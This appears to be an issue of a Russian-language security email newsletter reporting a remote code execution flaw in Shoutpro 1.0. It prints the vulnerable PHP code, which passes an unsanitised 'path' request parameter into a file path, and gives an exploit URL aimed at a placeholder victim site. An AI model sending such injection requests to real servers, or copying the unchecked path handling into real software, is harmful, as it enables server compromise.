Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Shoutpro.


Компьютер для продвинутых пользователей
В этом выпуске:
Shoutpro
ПО: Shoutpro
Версия: 1.0

Уязвимость:
Возможность выполнения кода на сервере.
Листинг:
include("config.php");
include("functions.php");
if ($path){
$ips = file("$path/lists/bannedips.php");
} else {
$ips = file("lists/bannedips.php");
}
if (in_array($REMOTE_ADDR,$ips)) {
echo($bannedmessage);
die;
}
Использование:
http://www.victim.com/Shoutpro/include.php?path=Command-Shell
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное